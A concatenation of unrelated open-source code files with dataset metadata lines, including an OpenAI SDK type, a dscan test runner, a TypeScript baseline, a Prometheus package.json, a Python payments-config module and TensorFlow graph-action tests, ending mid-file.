bbox = dict(boxstyle = 'round,pad=0.5', fc = (0.5, 0.5, 0.5), alpha = 0.1), zorder=10) | unknown | codeparrot/codeparrot-clean | ||
# File generated from our OpenAPI spec by Stainless. See CONTRIBUTING.md for details.
from typing_extensions import Literal
from ..._models import BaseModel
__all__ = ["ResponseAudioDoneEvent"]
class ResponseAudioDoneEvent(BaseModel):
"""Emitted when the audio response is complete."""
sequence_number: int
"""The sequence number of the delta."""
type: Literal["response.audio.done"]
"""The type of the event. Always `response.audio.done`.""" | python | github | https://github.com/openai/openai-python | src/openai/types/responses/response_audio_done_event.py |
from cement.core import handler, controller
from dscan.plugins import HumanBasePlugin
from subprocess import call
import os, sys, dscan
BASE_FOLDER = '/var/www/drupal/'
UPDATE_MAJOR = ['6', '7']
def recursive_grep(directory, needle):
return_file = None
for f in os.listdir(directory):
if f.endswith('.py'):
with open(directory + f, 'r') as fh:
for line in fh:
if needle in line:
return_file = f
if return_file:
break
return return_file
class Tests(HumanBasePlugin):
class Meta:
label = 'test'
stacked_on = 'base'
stacked_type = 'nested'
hide = True
arguments = [
(['-s', '--single-test'], dict(action='store', help='Name of test to run',
required=False, default=None)),
(['-3', '--just-three'], dict(action='store_true', help='Just run python 3 tests.',
required=False, default=None)),
(['-2', '--just-two'], dict(action='store_true', help='Just run python 3 tests.',
required=False, default=None)),
(['-c', '--with-coverage'], dict(action='store_true', help='Do test coverage',
required=False, default=False)),
]
@controller.expose(help='', hide=True)
def default(self):
env = {}
single_test = self.app.pargs.single_test
with_coverage = self.app.pargs.with_coverage
just_three = self.app.pargs.just_three
just_two = self.app.pargs.just_two
if single_test and with_coverage:
self.error('Cannot run with both -c and -s.')
exit = 0
if not single_test:
call_base = ['/usr/local/bin/nosetests', '--exclude=async']
if with_coverage:
call_base += ['--with-coverage', '--cover-package', 'dscan',
'--cover-inclusive', '--cover-html']
if not just_three:
e1 = call(['python2'] + call_base, env=env)
else:
e1 = 0
if not just_two:
e2 = call(['python3'] + call_base, env=env)
else:
e2 = 0
if e1 != 0 or e2 != 0:
exit = 1
else:
test_file = recursive_grep(dscan.PWD + 'tests/', single_test + "(")
if not test_file:
self.error('No test found with name "%s"' % single_test)
appendix = 'tests.py'
tna = test_file[0:-1 * len(appendix) - 1].split('_')
underscore = '_'.join(tna)
upper = "".join(w.capitalize() for w in tna)
test = 'dscan.tests.%s_tests:%sTests.%s' % (underscore, upper, single_test)
if just_two:
exit = call(['python2', '/usr/local/bin/nosetests', '--nocapture', test], env=env)
else:
exit = call(['python3', '/usr/local/bin/nosetests', '--nocapture', test], env=env)
sys.exit(exit)
def load(app=None):
handler.register(Tests) | unknown | codeparrot/codeparrot-clean | ||
//// [tests/cases/compiler/classDeclarationShouldBeOutOfScopeInComputedNames.ts] ////
//// [classDeclarationShouldBeOutOfScopeInComputedNames.ts]
class A {
static readonly p1 = Symbol();
static readonly p2 = Symbol();
// All of the below should be out of scope or TDZ - `A` has not finished being constructed as they are executed
static readonly [A.p1] = 0;
static [A.p2]() { return 0 };
[A.p1]() { }
[A.p2] = 0
}
//// [classDeclarationShouldBeOutOfScopeInComputedNames.js]
"use strict";
var _a, _b;
class A {
constructor() {
this[_b] = 0;
}
static [(_a = A.p1, A.p2)]() { return 0; }
;
[A.p1]() { }
}
_b = A.p2;
A.p1 = Symbol();
A.p2 = Symbol();
// All of the below should be out of scope or TDZ - `A` has not finished being constructed as they are executed
A[_a] = 0; | javascript | github | https://github.com/microsoft/TypeScript | tests/baselines/reference/classDeclarationShouldBeOutOfScopeInComputedNames.js |
{
"name": "@prometheus-io/codemirror-promql",
"version": "0.309.1",
"description": "a CodeMirror mode for the PromQL language",
"types": "dist/esm/index.d.ts",
"module": "dist/esm/index.js",
"main": "dist/cjs/index.js",
"scripts": {
"build": "npm run build:lib",
"build:lib": "bash ./build.sh",
"test": "NODE_OPTIONS=--experimental-vm-modules jest --runInBand",
"lint": "eslint src/ --ext .ts",
"lint:fix": "eslint --fix src/ --ext .ts"
},
"repository": {
"type": "git",
"url": "git+https://github.com/prometheus/prometheus.git"
},
"keywords": [
"promql",
"codemirror",
"mode",
"prometheus"
],
"author": "Prometheus Authors <prometheus-developers@googlegroups.com>",
"license": "Apache-2.0",
"bugs": {
"url": "https://github.com/prometheus/prometheus/issues"
},
"homepage": "https://github.com/prometheus/prometheus/blob/main/web/ui/module/codemirror-promql/README.md",
"dependencies": {
"@prometheus-io/lezer-promql": "0.309.1",
"lru-cache": "^11.2.5"
},
"devDependencies": {
"@codemirror/autocomplete": "^6.20.0",
"@codemirror/language": "^6.12.1",
"@codemirror/lint": "^6.9.3",
"@codemirror/state": "^6.5.4",
"@codemirror/view": "^6.39.12",
"@lezer/common": "^1.5.1",
"@lezer/highlight": "^1.2.3",
"@lezer/lr": "^1.4.8",
"eslint-plugin-prettier": "^5.5.5",
"isomorphic-fetch": "^3.0.0",
"nock": "^14.0.10"
},
"peerDependencies": {
"@codemirror/autocomplete": "^6.4.0",
"@codemirror/language": "^6.3.0",
"@codemirror/lint": "^6.0.0",
"@codemirror/state": "^6.1.1",
"@codemirror/view": "^6.4.0",
"@lezer/common": "^1.0.1"
},
"prettier": {
"singleQuote": true,
"trailingComma": "es5",
"printWidth": 150
},
"engines": {
"node": ">=12.0.0"
}
} | json | github | https://github.com/prometheus/prometheus | web/ui/module/codemirror-promql/package.json |
import builtins
if hasattr(builtins, "server"):
SERVER = builtins.server
else:
SERVER = False
import requests as reqs
import json
requests = reqs.session()
requests.trust_env = False
import os
import uuid
import shelve
import datetime
import getpass
from zashel.utils import search_win_drive
#STATIC Variables, not configurable
STATIC = ["USERS_FIELDS",
"USERS_UNIQUE",
"USERS_PERMISSIONS",
"PARI_FIELDS",
"PARI_UNIQUE",
"PAYMENTS_FIELDS",
"PAYMENTS_INDEX",
"MANUAL_FIELDS",
"BASE_URI",
"LOG_ERROR",
"LOG_ERROR_PARI",
"LOCAL_PATH",
"METODOS_FIELDS",
"COMMITMENTS_FIELDS",
"COMMITMENTS_INDEX"]
PATH = "PASTEL"
LOCAL_PATH = os.path.join(os.environ["LOCALAPPDATA"], "pastel")
if not os.path.exists(LOCAL_PATH):
os.makedirs(LOCAL_PATH)
LOCAL_CONFIG = os.path.join(LOCAL_PATH, "config")
if not os.path.exists(LOCAL_CONFIG):
os.makedirs(LOCAL_CONFIG)
USERS_FIELDS = ["id",
"fullname",
"role"]
USERS_UNIQUE = "id"
USERS_PERMISSIONS = ["type",
"model",
"verb",
"allowed"]
PARI_FIELDS = ["id_cliente",
"id_cuenta",
"numdoc",
"fecha_factura",
"id_factura",
"segmento",
"importe_adeudado",
"estado_recibo"]
PARI_UNIQUE = "id_factura"
PAYMENTS_FIELDS = ["fecha",
"importe",
"observaciones",
"dni",
"id_cliente",
"tels",
"oficina",
"posibles",
"estado"]
PAYMENTS_INDEX = ["fecha",
"importe",
"dni",
"id_cliente",
"oficina",
"estado"]
MANUAL_FIELDS = ["pagos_id",
"usuario",
"fecha",
"reportado"]
METODOS_FIELDS = "nombre"
COMMITMENTS_FIELDS = ["usuario",
"id_cliente",
"id_cuenta",
"id_factura",
"fecha_factura",
"importe",
"fecha",
"hora",
"canal",
"observaciones",
"estado"]
COMMITMENTS_INDEX = ["usuario",
"id_cliente",
"id_cuenta",
"id_factura",
"fecha_factura",
"importe",
"fecha",
"canal",
"estado"]
BASE_URI = "^/pastel/api/v1$"
class Path:
def __init__(self, path):
self._path = path
@property
def path(self):
if os.path.splitdrive(self._path)[0] == "":
def recursive_search(path, sub=None):
if sub is None:
sub = list()
paths = os.path.split(path)
sub.append(paths[1])
if paths[0] == "":
raise FileNotFoundError
try:
spath = os.path.join(search_win_drive(paths[0]),
*sub)
return spath
except FileNotFoundError:
recursive_search(paths[0], sub)
try:
return search_win_drive(self._path)
except FileNotFoundError:
return recursive_search(self._path)
else:
return self._path
@path.setter
def path(self, value):
self._path = value
#LOCAL defined variables
LOCAL = ["HOST", "PORT",
"PATH",
"EXPORT_PATH",
"ADMIN_DB",
"UUID",
"INIT_SERVER_STARTUP",
"ITEMS_PER_PAGE",
"USER"
]
REMOTE_PATHS = ["PATH",
"ADMIN_DB",
"EXPORT_PATH",
"DAILY_EXPORT_PATH",
"DATABASE_PATH",
"N43_PATH",
"N43_PATH_INCOMING",
"N43_PATH_OUTGOING",
"REPORT_PATH"
]
class LocalConfig: #To a dynamic access -> change API
cache = dict()
def __setattr__(self, attr, value):
shelf = shelve.open(os.path.join(LOCAL_CONFIG, "config"))
if attr in LOCAL:
LocalConfig.cache[attr] = value
if attr == "UUID":
shelf["UUID-timeout"] = datetime.datetime.now() + datetime.timedelta(hours=8)
else:
shelf[attr] = value
shelf.close()
def __getattr__(self, attr):
shelf = shelve.open(os.path.join(LOCAL_CONFIG, "config"))
if attr in LOCAL:
try:
data = shelf[attr]
except KeyError:
if attr == "UUID":
pass
while True:
if attr in LocalConfig.cache:
try:
data = LocalConfig.cache[attr]
except KeyError:
continue
else:
break
else:
raise
if attr in REMOTE_PATHS:
return Path(data).path
else:
if attr == "UUID":
try:
timeout = shelf["UUID-timeout"]
except KeyError:
if "UUID-timeout" in LocalConfig.cache:
timeout = LocalConfig.cache["UUID-timeout"]
else:
timeout = None
if timeout is not None and timeout < datetime.datetime.now():
data = uuid.uuid4()
shelf[attr] = data
return data
shelf.close()
def set(self, attr, value):
self.__setattr__(attr, value)
def set_default(self, attr, default):
shelf = shelve.open(os.path.join(LOCAL_CONFIG, "config"))
if attr in LOCAL and attr not in shelf:
shelf[attr] = default
shelf.close()
return self.__getattr__(attr.lower())
local_config = LocalConfig()
local_config.set_default("HOST", "172.16.138.70")
local_config.set_default("PORT", 44752)
local_config.set_default("INIT_SERVER_STARTUP", True)
local_config.set_default("PATH", PATH)
local_config.set_default("EXPORT_PATH", os.path.join(PATH, "Exportaciones"))
local_config.set_default("ADMIN_DB", os.path.join(PATH, "DB", "Admin"))
local_config.set_default("ITEMS_PER_PAGE", 50)
local_config.set_default("USER", getpass.getuser())
if not os.path.exists(local_config.ADMIN_DB):
os.makedirs(local_config.ADMIN_DB)
local_config.set_default("UUID", uuid.uuid4())
LOG_ERROR = os.path.join(LOCAL_PATH, "log_error_{}".format(local_config.UUID))
LOG_ERROR_PARI = os.path.join(LOCAL_PATH, "log_error_pari_{}".format(local_config.UUID))
SHARED = ["PM_CUSTOMER",
"PM_PAYMENT_METHOD",
"PM_PAYMENT_WAY",
"DAILY_EXPORT_PATH",
"PARI_FILE_FIELDS",
"DATABASE_PATH",
"N43_PATH",
"N43_PATH_INCOMING",
"N43_PATH_OUTGOING",
"REPORT_PATH",
"PAYMENTS_STATES",
"FACTURAS",
"FACTURAS_FILE",
"PAYMENTS_UPLOADING_HEADERS",
]
BO_EVENTS = ["Aplicacion de pagos ",
"BXI",
"Excesos de pagos /Devoluciones transf.",
"Factura cero",
"Factura duplicada",
"Cambio cuenta bancaria",
"Ilocalizados",
"Localización de pagos - Carga diaria",
"MotorFax",
"Pago por plantilla",
"Reconexiones, cambio Check",
"Remedy's",
"Errores",
"Informes",
"Errores Netplus",
"Otros",
"Adelantos",
"Asnef",
"Clientes sin cuenta",
"Tablas abonos",
"Correos",
"Fuera Plazo/Dev. Factura",
"Fichero Bajas CRM",
"RRSS",
"Desbloqueos",
"Error Emisora Orange",
"Localizacion Agencia Externa",
"Error SGCD + 6 Fact",
"Fichero Pasar a impago",
"Cierre Expedientes"]
class AdminConfig: #To a dynamic access -> change API -> Shit, I've repeated myself!
cache = dict()
def __init__(self):
if SERVER is False:
AdminConfig.cache.update(json.loads(requests.get("http://{}:{}{}/admin".format(local_config.HOST,
str(local_config.PORT),
BASE_URI[1:-1])).text))
def __setattr__(self, attr, value):
if attr in SHARED:
if SERVER is True:
shelf = shelve.open(os.path.join(local_config.ADMIN_DB, "config"))
AdminConfig.cache[attr] = value
shelf[attr] = value
shelf.close()
else:
requests.put("http://{}:{}{}/admin/{}".format(local_config.HOST,
str(local_config.PORT),
BASE_URI[1:-1],
str(attr)),
json={attr: value})
def __getattr__(self, attr):
if attr in SHARED:
data = {}
if SERVER is True:
shelf = shelve.open(os.path.join(local_config.ADMIN_DB, "config"))
try:
data = shelf[attr]
except KeyError:
if attr in AdminConfig.cache:
data = AdminConfig.cache[attr]
else:
raise
shelf.close()
else:
#data = requests.get("http://{}:{}{}/admin/{}".format(local_config.HOST,
# str(local_config.PORT),
# BASE_URI[1:-1],
# str(attr)))
#data = json.loads(data.text)
if attr in AdminConfig.cache:
data = AdminConfig.cache[attr]
else:
data = None
if attr in REMOTE_PATHS:
return Path(data).path
else:
return data
else:
return {}
def get(self, attr):
return self.__getattr__(attr)
def set(self, attr, value):
self.__setattr__(attr, value)
def set_default(self, attr, default):
if SERVER is True:
shelf = shelve.open(os.path.join(local_config.ADMIN_DB, "config"))
if attr in SHARED and attr not in shelf:
self.set(attr, default)
shelf.close()
return self.__getattr__(attr.lower())
admin_config = AdminConfig()
admin_config.set_default("DATABASE_PATH", os.path.join(PATH, "DB"))
admin_config.set_default("REPORT_PATH", os.path.join(PATH, "Reportes"))
admin_config.set_default("DAILY_EXPORT_PATH", os.path.join(PATH, "Exportaciones", "Diarias"))
admin_config.set_default("N43_PATH", os.path.join("INFORMES GESTIÓN DIARIA",
"0.REPORTES BBOO",
"001 CARPETA DE PAGOS",
"040 NORMA43_JAZZTEL"))
admin_config.set_default("N43_PATH_INCOMING", os.path.join("INFORMES GESTIÓN DIARIA",
"0.REPORTES BBOO",
"001 CARPETA DE PAGOS",
"040 NORMA43_JAZZTEL",
"041 ENTRADAS"))
admin_config.set_default("N43_PATH_OUTGOING", os.path.join("INFORMES GESTIÓN DIARIA",
"0.REPORTES BBOO",
"001 CARPETA DE PAGOS",
"040 NORMA43_JAZZTEL",
"042 SALIDAS"))
admin_config.set_default("PARI_FILE_FIELDS", ["id_cliente",
"id_cuenta",
"numdoc",
"tipodoc",
"fecha_factura",
"fecha_puesta_cobro",
"id_factura",
"segmento",
"importe_adeudado",
"metodo_pago",
"fecha_devolucion",
"importe_devolucion",
"fecha_pago",
"importe_aplicado",
"metodo_recobro",
"fecha_entrada_fichero",
"fecha_salida_fichero",
"estado_recibo",
"primera_factura"])
admin_config.set_default("PM_CUSTOMER", "DEPARTAMENTO DE COBROS")
admin_config.set_default("PM_PAYMENT_METHOD", "TRANSFERENCIA")
admin_config.set_default("PM_PAYMENT_WAY", "INTERNA")
admin_config.set_default("PAYMENTS_STATES",
["", "PENDIENTE", "APLICADO", "ILOCALIZABLE", "GRAN CUENTA", "DEUDA VENDIDA", "PAGO ORANGE"])
admin_config.set_default("FACTURAS_FILE", "codes.txt")
admin_config.set_default("PAYMENTS_UPLOADING_HEADERS", ["fecha_aplicacion",
"codigo",
"nombre",
"nif",
"id_factura",
"fecha_pago",
"importe",
"periodo_facturado",
"metodo",
"via"
])
facturas = dict()
with open(admin_config.FACTURAS_FILE, "r") as f:
for row in f:
code, date = row.split(";")
date = date.strip("\n")
facturas[datetime.datetime.strptime(date, "%d/%m/%Y")] = code
admin_config.set_default("FACTURAS", facturas)
__all__ = list()
__all__.extend(STATIC)
#__all__.extend(LOCAL)
#__all__.extend(SHARED)
__all__.extend(["local_config",
"admin_config",
"LOCAL",
"SHARED",
"get_billing_period"
])
def get_billing_period(invoice_date): # TODO: Get this Out of here
if isinstance(invoice_date, str):
invoice_date = datetime.datetime.strptime(invoice_date, "%d/%m/%y").date()
if isinstance(invoice_date, datetime.datetime):
invoice_date = invoice_date.date()
assert isinstance(invoice_date, datetime.date)
prev_day = datetime.date.fromordinal((invoice_date - datetime.date(1, 1, 1)).days)
# prev_day = invoice_date
if prev_day.day == 7:
prev_day = prev_day.replace(day=8)
prev_month_day = prev_day.day
prev_month_month = prev_day.month - 1
if prev_month_month == 0:
prev_month_month = 12
prev_month_year = prev_day.year - 1
else:
prev_month_year = prev_day.year
prev_month = datetime.date(prev_month_year, prev_month_month, prev_month_day)
return "{}-{}".format(prev_month.strftime("%d/%m/%y"), prev_day.strftime("%d/%m/%y")) | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Graph actions tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import tempfile
from tensorflow.contrib import testing
from tensorflow.contrib.framework.python.framework import checkpoint_utils
from tensorflow.contrib.framework.python.ops import variables as variables_lib
from tensorflow.contrib.learn.python import learn
from tensorflow.contrib.learn.python.learn.monitors import BaseMonitor
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resources
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.summary import summary
from tensorflow.python.training import saver as saver_lib
class _Feeder(object):
"""Simple generator for `feed_fn`, returning 10 * step."""
def __init__(self, tensor, max_step):
self._step = 0
self._tensor = tensor
self._max_step = max_step
@property
def step(self):
return self._step
def feed_fn(self):
if self._step >= self._max_step:
raise StopIteration
value = self._step * 10.0
self._step += 1
return {self._tensor: value}
class _BaseMonitorWrapper(BaseMonitor):
"""Base monitor wrapper to facilitate testing.
This monitor can act as either chief-exclusive or non-exclusive.
"""
def __init__(self, run_on_all_workers):
super(_BaseMonitorWrapper, self).__init__()
self._run_on_all_workers = run_on_all_workers
self._is_active = False
self._has_step = False
@property
def run_on_all_workers(self):
return self._run_on_all_workers
@property
def is_active(self):
return self._is_active
@property
def has_step(self):
return self._has_step
def begin(self, max_steps=None):
self._is_active = True
return super(_BaseMonitorWrapper, self).begin(max_steps)
def step_begin(self, step):
self._has_step = True
return super(_BaseMonitorWrapper, self).step_begin(step)
class GraphActionsTest(test.TestCase):
"""Graph actions tests."""
def setUp(self):
learn.graph_actions.clear_summary_writers()
self._output_dir = tempfile.mkdtemp()
testing.FakeSummaryWriter.install()
def tearDown(self):
testing.FakeSummaryWriter.uninstall()
if self._output_dir:
shutil.rmtree(self._output_dir)
learn.graph_actions.clear_summary_writers()
def _assert_summaries(self,
output_dir,
writer,
expected_summaries=None,
expected_graphs=None,
expected_meta_graphs=None,
expected_session_logs=None):
self.assertTrue(isinstance(writer, testing.FakeSummaryWriter))
writer.assert_summaries(
self,
expected_logdir=output_dir,
expected_graph=ops.get_default_graph(),
expected_summaries=expected_summaries,
expected_added_graphs=expected_graphs,
expected_added_meta_graphs=expected_meta_graphs,
expected_session_logs=expected_session_logs)
# TODO(ptucker): Test number and contents of checkpoint files.
def _assert_ckpt(self, output_dir, expected=True):
ckpt_state = saver_lib.get_checkpoint_state(output_dir)
if expected:
pattern = '%s/model.ckpt-.*' % output_dir
primary_ckpt_path = ckpt_state.model_checkpoint_path
self.assertRegexpMatches(primary_ckpt_path, pattern)
all_ckpt_paths = ckpt_state.all_model_checkpoint_paths
self.assertTrue(primary_ckpt_path in all_ckpt_paths)
for ckpt_path in all_ckpt_paths:
self.assertRegexpMatches(ckpt_path, pattern)
else:
self.assertTrue(ckpt_state is None)
# TODO(ptucker): Test lock, multi-threaded access?
def test_summary_writer(self):
writer = learn.graph_actions.get_summary_writer('log/dir/0')
self._assert_summaries('log/dir/0', writer)
self.assertTrue(
learn.graph_actions.get_summary_writer('log/dir/0') is
learn.graph_actions.get_summary_writer('log/dir/0'))
self.assertTrue(
learn.graph_actions.get_summary_writer('log/dir/0') is
not learn.graph_actions.get_summary_writer('log/dir/1'))
# TODO(ptucker): Test restore_checkpoint_path for eval; this should obsolete
# test_evaluate_with_saver().
# TODO(ptucker): Test start_queue_runners for both eval & train.
# TODO(ptucker): Test coord.request_stop & coord.join for eval.
def _build_inference_graph(self):
"""Build simple inference graph.
This includes a regular variable, local variable, and fake table.
Returns:
Tuple of 3 `Tensor` objects, 2 input and 1 output.
"""
variables_lib.create_global_step()
in0 = variables.Variable(1.0)
in1 = variables_lib.local_variable(2.0)
fake_table = variables.Variable(
3.0,
trainable=False,
collections=['fake_tables'],
name='fake_table_var')
in0.graph.add_to_collections([ops.GraphKeys.TABLE_INITIALIZERS],
fake_table.initializer)
out = in0 + in1 + fake_table
return in0, in1, out
def test_infer(self):
with ops.Graph().as_default() as g, self.test_session(g):
self._assert_ckpt(self._output_dir, False)
in0, in1, out = self._build_inference_graph()
self.assertEqual({
'a': 1.0,
'b': 2.0,
'c': 6.0
}, learn.graph_actions.infer(None, {'a': in0,
'b': in1,
'c': out}))
self._assert_ckpt(self._output_dir, False)
@test.mock.patch.object(
learn.graph_actions.coordinator.Coordinator,
'request_stop',
side_effect=learn.graph_actions.coordinator.Coordinator.request_stop,
autospec=True)
def test_coordinator_request_stop_called(self, request_stop):
with ops.Graph().as_default() as g, self.test_session(g):
in0, in1, out = self._build_inference_graph()
learn.graph_actions.infer(None, {'a': in0, 'b': in1, 'c': out})
self.assertTrue(request_stop.called)
@test.mock.patch.object(
learn.graph_actions.coordinator.Coordinator,
'request_stop',
side_effect=learn.graph_actions.coordinator.Coordinator.request_stop,
autospec=True)
def test_run_feeds_iter_cleanup_with_exceptions(self, request_stop):
with ops.Graph().as_default() as g, self.test_session(g):
in0, in1, out = self._build_inference_graph()
try:
for _ in learn.graph_actions.run_feeds_iter({
'a': in0,
'b': in1,
'c': out
}, [None] * 3):
self.assertFalse(request_stop.called)
raise ValueError('Fake exception')
except ValueError:
pass
self.assertTrue(request_stop.called)
def test_run_feeds_iter_calls_resources_init(self):
with ops.Graph().as_default():
in0, _, _ = self._build_inference_graph()
handle = test_ops.stub_resource_handle_op(container='a', shared_name='b')
resources.register_resource(
handle=handle,
create_op=test_ops.resource_create_op(handle),
is_initialized_op=test_ops.resource_initialized_op(handle))
for _ in learn.graph_actions.run_feeds_iter(
{
'in0': in0
}, feed_dicts=[{}]):
self.assertTrue(test_ops.resource_initialized_op(handle).eval())
def test_infer_different_default_graph(self):
with self.test_session():
self._assert_ckpt(self._output_dir, False)
with ops.Graph().as_default():
in0, in1, out = self._build_inference_graph()
with ops.Graph().as_default():
self.assertEqual({
'a': 1.0,
'b': 2.0,
'c': 6.0
}, learn.graph_actions.infer(None, {'a': in0,
'b': in1,
'c': out}))
self._assert_ckpt(self._output_dir, False)
def test_infer_invalid_feed(self):
with ops.Graph().as_default() as g, self.test_session(g):
self._assert_ckpt(self._output_dir, False)
in0, _, _ = self._build_inference_graph()
with self.assertRaisesRegexp(TypeError, 'Can not convert a NoneType'):
learn.graph_actions.infer(None, {'a': in0}, feed_dict={None: 4.0})
self._assert_ckpt(self._output_dir, False)
def test_infer_feed(self):
with ops.Graph().as_default() as g, self.test_session(g):
self._assert_ckpt(self._output_dir, False)
in0, _, out = self._build_inference_graph()
self.assertEqual(
{
'c': 9.0
},
learn.graph_actions.infer(
None, {'c': out}, feed_dict={in0: 4.0}))
self._assert_ckpt(self._output_dir, False)
# TODO(ptucker): Test eval for 1 epoch.
def test_evaluate_invalid_args(self):
with ops.Graph().as_default() as g, self.test_session(g):
self._assert_ckpt(self._output_dir, False)
with self.assertRaisesRegexp(ValueError, 'utput directory'):
learn.graph_actions.evaluate(
g,
output_dir=None,
checkpoint_path=None,
eval_dict={'a': constant_op.constant(1.0)})
with self.assertRaisesRegexp(ValueError, 'utput directory'):
learn.graph_actions.evaluate(
g,
output_dir='',
checkpoint_path=None,
eval_dict={'a': constant_op.constant(1.0)})
self._assert_ckpt(self._output_dir, False)
def test_evaluate(self):
with ops.Graph().as_default() as g, self.test_session(g):
_, _, out = self._build_inference_graph()
writer = learn.graph_actions.get_summary_writer(self._output_dir)
self._assert_summaries(self._output_dir, writer, expected_session_logs=[])
self._assert_ckpt(self._output_dir, False)
results = learn.graph_actions.evaluate(
g,
output_dir=self._output_dir,
checkpoint_path=None,
eval_dict={'a': out},
max_steps=1)
self.assertEqual(({'a': 6.0}, 0), results)
self._assert_summaries(
self._output_dir,
writer,
expected_summaries={0: {
'a': 6.0
}},
expected_session_logs=[])
self._assert_ckpt(self._output_dir, False)
def test_evaluate_ready_for_local_init(self):
with ops.Graph().as_default() as g, self.test_session(g):
variables_lib.create_global_step()
v = variables.Variable(1.0)
variables.Variable(
v + 1, collections=[ops.GraphKeys.LOCAL_VARIABLES], trainable=False)
ready_for_local_init_op = variables.report_uninitialized_variables(
variables.global_variables())
ops.add_to_collection(ops.GraphKeys.READY_FOR_LOCAL_INIT_OP,
ready_for_local_init_op)
_ = learn.graph_actions.evaluate(
g,
output_dir=self._output_dir,
checkpoint_path=None,
eval_dict={'a': v},
max_steps=1)
def test_evaluate_feed_fn(self):
with ops.Graph().as_default() as g, self.test_session(g):
in0, _, out = self._build_inference_graph()
writer = learn.graph_actions.get_summary_writer(self._output_dir)
self._assert_summaries(self._output_dir, writer, expected_session_logs=[])
self._assert_ckpt(self._output_dir, False)
feeder = _Feeder(in0, 3)
results = learn.graph_actions.evaluate(
g,
output_dir=self._output_dir,
checkpoint_path=None,
eval_dict={'a': out},
feed_fn=feeder.feed_fn,
max_steps=3)
self.assertEqual(3, feeder.step)
self.assertEqual(({'a': 25.0}, 0), results)
self._assert_summaries(
self._output_dir,
writer,
expected_summaries={0: {
'a': 25.0
}},
expected_session_logs=[])
self._assert_ckpt(self._output_dir, False)
def test_evaluate_feed_fn_with_exhaustion(self):
with ops.Graph().as_default() as g, self.test_session(g):
in0, _, out = self._build_inference_graph()
writer = learn.graph_actions.get_summary_writer(self._output_dir)
self._assert_summaries(self._output_dir, writer, expected_session_logs=[])
feeder = _Feeder(in0, 2)
results = learn.graph_actions.evaluate(
g,
output_dir=self._output_dir,
checkpoint_path=None,
eval_dict={'a': out},
feed_fn=feeder.feed_fn,
max_steps=3)
self.assertEqual(2, feeder.step)
self.assertEqual(({'a': 15.0}, 0), results)
self._assert_summaries(
self._output_dir,
writer,
expected_summaries={0: {
'a': 15.0
}},
expected_session_logs=[])
def test_evaluate_with_saver(self):
with ops.Graph().as_default() as g, self.test_session(g):
_, _, out = self._build_inference_graph()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
writer = learn.graph_actions.get_summary_writer(self._output_dir)
self._assert_summaries(self._output_dir, writer, expected_session_logs=[])
results = learn.graph_actions.evaluate(
g,
output_dir=self._output_dir,
checkpoint_path=None,
eval_dict={'a': out},
max_steps=1)
self.assertEqual(({'a': 6.0}, 0), results)
self._assert_summaries(
self._output_dir,
writer,
expected_summaries={0: {
'a': 6.0
}},
expected_session_logs=[])
# TODO(ptucker): Resume training from previous ckpt.
# TODO(ptucker): !supervisor_is_chief
# TODO(ptucker): Custom init op for training.
# TODO(ptucker): Mock supervisor, and assert all interactions.
# TODO(ispir): remove following tests after deprecated train.
class GraphActionsTrainTest(test.TestCase):
"""Tests for train."""
def setUp(self):
learn.graph_actions.clear_summary_writers()
self._output_dir = tempfile.mkdtemp()
testing.FakeSummaryWriter.install()
def tearDown(self):
testing.FakeSummaryWriter.uninstall()
if self._output_dir:
shutil.rmtree(self._output_dir)
learn.graph_actions.clear_summary_writers()
def _assert_summaries(self,
output_dir,
expected_summaries=None,
expected_graphs=None,
expected_meta_graphs=None,
expected_session_logs=None):
writer = learn.graph_actions.get_summary_writer(output_dir)
self.assertTrue(isinstance(writer, testing.FakeSummaryWriter))
writer.assert_summaries(
self,
expected_logdir=output_dir,
expected_graph=ops.get_default_graph(),
expected_summaries=expected_summaries,
expected_added_graphs=expected_graphs,
expected_added_meta_graphs=expected_meta_graphs,
expected_session_logs=expected_session_logs)
# TODO(ptucker): Test number and contents of checkpoint files.
def _assert_ckpt(self, output_dir, expected=True):
ckpt_state = saver_lib.get_checkpoint_state(output_dir)
if expected:
pattern = '%s/model.ckpt-.*' % output_dir
primary_ckpt_path = ckpt_state.model_checkpoint_path
self.assertRegexpMatches(primary_ckpt_path, pattern)
all_ckpt_paths = ckpt_state.all_model_checkpoint_paths
self.assertTrue(primary_ckpt_path in all_ckpt_paths)
for ckpt_path in all_ckpt_paths:
self.assertRegexpMatches(ckpt_path, pattern)
else:
self.assertTrue(ckpt_state is None)
def _build_inference_graph(self):
"""Build simple inference graph.
This includes a regular variable, local variable, and fake table.
Returns:
Tuple of 3 `Tensor` objects, 2 input and 1 output.
"""
variables_lib.create_global_step()
in0 = variables.Variable(1.0)
in1 = variables_lib.local_variable(2.0)
fake_table = variables.Variable(
3.0,
trainable=False,
collections=['fake_tables'],
name='fake_table_var')
in0.graph.add_to_collections([ops.GraphKeys.TABLE_INITIALIZERS],
fake_table.initializer)
out = in0 + in1 + fake_table
return in0, in1, out
def test_train_invalid_args(self):
with ops.Graph().as_default() as g, self.test_session(g):
train_op = constant_op.constant(1.0)
loss_op = constant_op.constant(2.0)
with self.assertRaisesRegexp(ValueError, 'utput directory'):
learn.graph_actions.train(
g, output_dir=None, train_op=train_op, loss_op=loss_op)
with self.assertRaisesRegexp(ValueError, 'utput directory'):
learn.graph_actions.train(
g,
output_dir='',
train_op=constant_op.constant(1.0),
loss_op=constant_op.constant(2.0))
with self.assertRaisesRegexp(ValueError, 'train_op'):
learn.graph_actions.train(
g, output_dir=self._output_dir, train_op=None, loss_op=loss_op)
with self.assertRaisesRegexp(ValueError, 'loss_op'):
learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=constant_op.constant(1.0),
loss_op=None)
with self.assertRaisesRegexp(ValueError, 'global_step'):
learn.graph_actions.train(
g,
